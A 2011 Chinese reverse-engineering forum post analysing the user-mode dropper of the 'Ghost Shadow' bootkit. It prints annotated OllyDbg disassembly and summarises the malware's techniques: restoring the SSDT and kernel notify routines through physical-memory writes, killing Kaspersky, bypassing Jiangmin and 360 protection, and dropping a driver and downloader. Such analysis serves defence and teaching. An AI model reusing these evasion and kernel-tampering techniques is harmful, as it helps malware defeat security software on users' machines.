标 题: 【申精】鬼影母体R3部分分析
作 者: 苏
时 间: 2011-03-30,16:40:30
链 接: http://bbs.pediy.com/showthread.php?t=131317
这是前段时间比较牛X的一个病毒
里面用到的一些手段很不错
特拿来分析,与大家共享
不说废话,直接开始分析
先上个OD大图,给大家一个流程感
00404612 >/$ 55 push ebp
00404613 |. 8BEC mov ebp, esp
00404615 |. 81EC 580A0000 sub esp, 0A58
0040461B |. 53 push ebx
0040461C |. 56 push esi
0040461D |. 57 push edi
0040461E |. 6A 1D push 1D
00404620 |. 33DB xor ebx, ebx
00404622 |. 59 pop ecx
00404623 |. 33C0 xor eax, eax
00404625 |. 8DBD 4DFFFFFF lea edi, dword ptr [ebp-B3]
0040462B |. 889D 4CFFFFFF mov byte ptr [ebp-B4], bl
00404631 |. 6A 1D push 1D
00404633 |. F3:AB rep stos dword ptr es:[edi]
00404635 |. 66:AB stos word ptr es:[edi]
00404637 |. AA stos byte ptr es:[edi]
00404638 |. 59 pop ecx
00404639 |. 33C0 xor eax, eax
0040463B |. 8DBD D1FDFFFF lea edi, dword ptr [ebp-22F]
00404641 |. 889D D0FDFFFF mov byte ptr [ebp-230], bl
00404647 |. F3:AB rep stos dword ptr es:[edi]
00404649 |. 66:AB stos word ptr es:[edi]
0040464B |. AA stos byte ptr es:[edi]
0040464C |. E8 21F0FFFF call 00403672 ; 载入函数库
00404651 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
00404657 |. 50 push eax
00404658 |. E8 75FCFFFF call 004042D2 ; 获得系统目录,组合字符串
0040465D |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
00404663 |. C70424 607740>mov dword ptr [esp], 00407760
0040466A |. 50 push eax
0040466B |. FF15 78774000 call dword ptr [407778]
00404671 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
00404677 |. 50 push eax
00404678 |. FF15 74774000 call dword ptr [407774]
0040467E |. 83C4 0C add esp, 0C
00404681 |. 8BF0 mov esi, eax
00404683 |. 8D85 B4F8FFFF lea eax, dword ptr [ebp-74C]
00404689 |. 68 04010000 push 104 ; /BufSize = 104 (260.)
0040468E |. 50 push eax ; |PathBuffer
0040468F |. 53 push ebx ; |hModule
00404690 |. FF15 6C604000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00404696 |. 8D85 B8F9FFFF lea eax, dword ptr [ebp-648]
0040469C |. C785 B8F9FFFF>mov dword ptr [ebp-648], 94
004046A6 |. 50 push eax ; /pVersionInformation
004046A7 |. FF15 E4604000 call dword ptr [<&KERNEL32.GetVersion>; \GetVersionExA
004046AD |. 83BD BCF9FFFF>cmp dword ptr [ebp-644], 5 ; 判断操作系统版本,只感染xp
004046B4 |. 74 05 je short 004046BB
004046B6 |. E8 42CBFFFF call 004011FD
004046BB |> 83BD C0F9FFFF>cmp dword ptr [ebp-640], 1
004046C2 |. 74 05 je short 004046C9
004046C4 |. E8 34CBFFFF call 004011FD
004046C9 |> 68 50774000 push 00407750 ; /MutexName = "Q360MonMutex"
004046CE |. 53 push ebx ; |InitialOwner
004046CF |. 53 push ebx ; |pSecurity
004046D0 |. FF15 E0604000 call dword ptr [<&KERNEL32.CreateMute>; \CreateMutexA
004046D6 |. FF15 58604000 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
004046DC |. 3D B7000000 cmp eax, 0B7 ; 检测360
004046E1 |. 74 34 je short 00404717
004046E3 |. 6A 01 push 1
004046E5 |. E8 27D5FFFF call 00401C11 ; 恢复SSDT
004046EA |. 59 pop ecx
004046EB |. E8 E1CDFFFF call 004014D1 ; nop
004046F0 |> E8 A7E0FFFF /call 0040279C ; 结束卡巴
004046F5 |. 85C0 |test eax, eax
004046F7 |. 74 0D |je short 00404706
004046F9 |. 68 E8030000 |push 3E8 ; /Timeout = 1000. ms
004046FE |. FF15 BC604000 |call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00404704 |.^ EB EA \jmp short 004046F0
00404706 |> 6A 01 push 1
00404708 |. 6A 02 push 2
0040470A |. 68 931A4000 push 00401A93
0040470F |. E8 CECEFFFF call 004015E2 ; 对抗其他杀软
00404714 |. 83C4 0C add esp, 0C
00404717 |> 68 F4010000 push 1F4 ; /Timeout = 500. ms
0040471C |. FF15 BC604000 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00404722 |. E8 3CFCFFFF call 00404363 ; 释放sys与ini文件
00404727 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
0040472D |. 50 push eax
0040472E |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4]
00404734 |. 50 push eax
00404735 |. FF15 70774000 call dword ptr [407770]
0040473B |. 59 pop ecx
0040473C |. C68435 4CFFFF>mov byte ptr [ebp+esi-B4], 30
00404744 |. 59 pop ecx
00404745 |. C68435 4DFFFF>mov byte ptr [ebp+esi-B3], 30
0040474D |. C68435 4EFFFF>mov byte ptr [ebp+esi-B2], 30 ; 释放00000000
00404755 |. 53 push ebx ; /hTemplateFile
00404756 |. C68435 4FFFFF>mov byte ptr [ebp+esi-B1], 30 ; |
0040475E |. 68 80000000 push 80 ; |Attributes = NORMAL
00404763 |. C68435 50FFFF>mov byte ptr [ebp+esi-B0], 30 ; |
0040476B |. 6A 03 push 3 ; |Mode = OPEN_EXISTING
0040476D |. C68435 51FFFF>mov byte ptr [ebp+esi-AF], 30 ; |
00404775 |. 53 push ebx ; |pSecurity
00404776 |. C68435 52FFFF>mov byte ptr [ebp+esi-AE], 30 ; |
0040477E |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00404780 |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4] ; |
00404786 |. C68435 53FFFF>mov byte ptr [ebp+esi-AD], 30 ; |
0040478E |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00404793 |. C68435 54FFFF>mov byte ptr [ebp+esi-AC], 30 ; |
0040479B |. 50 push eax ; |FileName
0040479C |. 889C35 55FFFF>mov byte ptr [ebp+esi-AB], bl ; |
004047A3 |. FF15 04614000 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
004047A9 |. 8BF8 mov edi, eax
004047AB |. 83FF FF cmp edi, -1
004047AE |. 897D FC mov dword ptr [ebp-4], edi
004047B1 |. 75 05 jnz short 004047B8
004047B3 |. E8 45CAFFFF call 004011FD
004047B8 |> 53 push ebx ; /pFileSizeHigh
004047B9 |. 57 push edi ; |hFile
004047BA |. FF15 FC604000 call dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
004047C0 |. 6A 40 push 40 ; /Protect = PAGE_EXECUTE_READWRITE
004047C2 |. 68 00100000 push 1000 ; |AllocationType = MEM_COMMIT
004047C7 |. 50 push eax ; |Size
004047C8 |. 53 push ebx ; |Address
004047C9 |. 8945 F8 mov dword ptr [ebp-8], eax ; |
004047CC |. 895D F0 mov dword ptr [ebp-10], ebx ; |
004047CF |. 8945 E8 mov dword ptr [ebp-18], eax ; |
004047D2 |. FF15 24614000 call dword ptr [<&KERNEL32.VirtualAll>; \VirtualAlloc
004047D8 |. 8BF0 mov esi, eax
004047DA |. 8D45 F0 lea eax, dword ptr [ebp-10]
004047DD |. 53 push ebx ; /pOverlapped
004047DE |. 50 push eax ; |pBytesRead
004047DF |. FF75 F8 push dword ptr [ebp-8] ; |BytesToRead
004047E2 |. 56 push esi ; |Buffer
004047E3 |. 57 push edi ; |hFile
004047E4 |. FF15 0C614000 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
004047EA |. 8B4D F8 mov ecx, dword ptr [ebp-8]
004047ED |. 8BC6 mov eax, esi
004047EF |. 03CE add ecx, esi
004047F1 |. 3BF1 cmp esi, ecx
004047F3 |. 73 0D jnb short 00404802
004047F5 |> 8138 76620D78 /cmp dword ptr [eax], 780D6276
004047FB |. 74 05 |je short 00404802
004047FD |. 40 |inc eax
004047FE |. 3BC1 |cmp eax, ecx
00404800 |.^ 72 F3 \jb short 004047F5
00404802 |> 68 48010000 push 148
00404807 |. 68 94744000 push 00407494
0040480C |. 50 push eax
0040480D |. FF15 7C774000 call dword ptr [40777C]
00404813 |. 8B46 3C mov eax, dword ptr [esi+3C]
00404816 |. 83C4 0C add esp, 0C
00404819 |. 05 50010000 add eax, 150
0040481E |. 8945 F0 mov dword ptr [ebp-10], eax
00404821 |. 03C6 add eax, esi
00404823 |. 53 push ebx
00404824 |. 8B48 0C mov ecx, dword ptr [eax+C]
00404827 |. 894D F8 mov dword ptr [ebp-8], ecx
0040482A |. 8B40 08 mov eax, dword ptr [eax+8]
0040482D |. 8945 F0 mov dword ptr [ebp-10], eax
00404830 |. 50 push eax
00404831 |. 8D040E lea eax, dword ptr [esi+ecx]
00404834 |. 50 push eax
00404835 |. E8 FCF9FFFF call 00404236
0040483A |. 53 push ebx ; /Origin
0040483B |. 53 push ebx ; |pOffsetHi
0040483C |. 53 push ebx ; |OffsetLo
0040483D |. 57 push edi ; |hFile
0040483E |. 8B3D 08614000 mov edi, dword ptr [<&KERNEL32.SetFi>; |kernel32.SetFilePointer
00404844 |. FFD7 call edi ; \SetFilePointer
00404846 |. 8D45 F0 lea eax, dword ptr [ebp-10]
00404849 |. 53 push ebx ; /pOverlapped
0040484A |. 50 push eax ; |pBytesWritten
0040484B |. FF75 E8 push dword ptr [ebp-18] ; |nBytesToWrite
0040484E |. 56 push esi ; |Buffer
0040484F |. FF75 FC push dword ptr [ebp-4] ; |hFile
00404852 |. FF15 00614000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
00404858 |. 68 00400000 push 4000 ; /FreeType = MEM_DECOMMIT
0040485D |. FF75 E8 push dword ptr [ebp-18] ; |Size
00404860 |. 56 push esi ; |Address
00404861 |. FF15 1C614000 call dword ptr [<&KERNEL32.VirtualFre>; \VirtualFree
00404867 |. FF75 FC push dword ptr [ebp-4] ; /hObject
0040486A |. FF15 14614000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00404870 |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
00404876 |. 50 push eax
00404877 |. 8D85 D0FDFFFF lea eax, dword ptr [ebp-230]
0040487D |. 50 push eax
0040487E |. FF15 70774000 call dword ptr [407770]
00404884 |. 8D85 D0FDFFFF lea eax, dword ptr [ebp-230]
0040488A |. 50 push eax
0040488B |. FF15 74774000 call dword ptr [407774]
00404891 |. 8BF0 mov esi, eax
00404893 |. 83C4 0C add esp, 0C
00404896 |. 8D85 D0FDFFFF lea eax, dword ptr [ebp-230]
0040489C |. C68435 D0FDFF>mov byte ptr [ebp+esi-230], 30
004048A4 |. C68435 D1FDFF>mov byte ptr [ebp+esi-22F], 30
004048AC |. C68435 D2FDFF>mov byte ptr [ebp+esi-22E], 30
004048B4 |. C68435 D3FDFF>mov byte ptr [ebp+esi-22D], 30
004048BC |. C68435 D4FDFF>mov byte ptr [ebp+esi-22C], 30 ; 复制成一个新文件
004048C4 |. 53 push ebx ; /FailIfExists
004048C5 |. C68435 D5FDFF>mov byte ptr [ebp+esi-22B], 30 ; |
004048CD |. 50 push eax ; |NewFileName
004048CE |. C68435 D6FDFF>mov byte ptr [ebp+esi-22A], 30 ; |
004048D6 |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4] ; |
004048DC |. C68435 D7FDFF>mov byte ptr [ebp+esi-229], 30 ; |
004048E4 |. C68435 D8FDFF>mov byte ptr [ebp+esi-228], 31 ; |
004048EC |. 50 push eax ; |ExistingFileName
004048ED |. 889C35 D9FDFF>mov byte ptr [ebp+esi-227], bl ; |
004048F4 |. FF15 D0604000 call dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA
004048FA |. 8D85 54FCFFFF lea eax, dword ptr [ebp-3AC]
00404900 |. 50 push eax
00404901 |. 8D85 4CFFFFFF lea eax, dword ptr [ebp-B4]
00404907 |. 50 push eax
00404908 |. FF15 70774000 call dword ptr [407770]
0040490E |. C68435 4CFFFF>mov byte ptr [ebp+esi-B4], 61
00404916 |. C68435 4DFFFF>mov byte ptr [ebp+esi-B3], 74
0040491E |. C68435 4EFFFF>mov byte ptr [ebp+esi-B2], 69
00404926 |. C68435 4FFFFF>mov byte ptr [ebp+esi-B1], 78
0040492E |. C68435 50FFFF>mov byte ptr [ebp+esi-B0], 69
00404936 |. 59 pop ecx
00404937 |. C68435 51FFFF>mov byte ptr [ebp+esi-AF], 2E
0040493F |. C68435 52FFFF>mov byte ptr [ebp+esi-AE], 73
00404947 |. 59 pop ecx
00404948 |. C68435 53FFFF>mov byte ptr [ebp+esi-AD], 79
00404950 |. C68435 54FFFF>mov byte ptr [ebp+esi-AC], 73
00404958 |. 889C35 55FFFF>mov byte ptr [ebp+esi-AB], bl
0040495F |. 68 34774000 push 00407734 ; /EventName = "Jiangmin_WallNotify_Notify"
00404964 |. 53 push ebx ; |InitiallySignaled
00404965 |. 53 push ebx ; |ManualReset
00404966 |. 53 push ebx ; |pSecurity
00404967 |. FF15 B0604000 call dword ptr [<&KERNEL32.CreateEven>; \CreateEventA
0040496D |. FF15 58604000 call dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
00404973 |. 3D B7000000 cmp eax, 0B7
00404978 |. 0F85 0F020000 jnz 00404B8D ; 判断是否存在江民
0040497E |. B9 81000000 mov ecx, 81 ; 下面是绕过江民主防部分
00404983 |. 33C0 xor eax, eax
1.病毒首先判断OS版本,只感染特定的windows系统,并且保证内存映像的唯一
2.先提升进程权限,在通过NtQuerySystemInformation获得ntoskrnl在磁盘里的真名,在通过到处SSDT表,将原始的SSDT表内容读取出来,然后通过ZwSystemDebugControl直接写物理实际内存,从而恢复SSDT,然后用同样的手法恢复了
PsSetLoadImageNotifyRoutine
PsSetCreateProcessNotifyRoutine
PsSetCreateThreadNotifyRoutine
这三个函数,由于函数太长,就不截取OD里的,详细见IDA里的注释
3.病毒遍历进程,寻找卡巴进程,然后破坏进程
4.病毒释放驱动,驱动配置文件,木马下载器在
C:\Program files\MSDN\
目录下
5.通过创建互斥量方法判断江民杀毒软件是否存在,存在的话,绕过其主防
6.病毒在通过硬件驱动类型加载方式加载驱动,以躲避主防的驱动加载监控
读写物理内存那块看的头晕,所有我就用C语言把它还原了,见附件
行为一个个用OD截取很麻烦
所有直接吧IDB放上去,大家可以对应的看
过几天我在吧驱动部分分析发上来
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界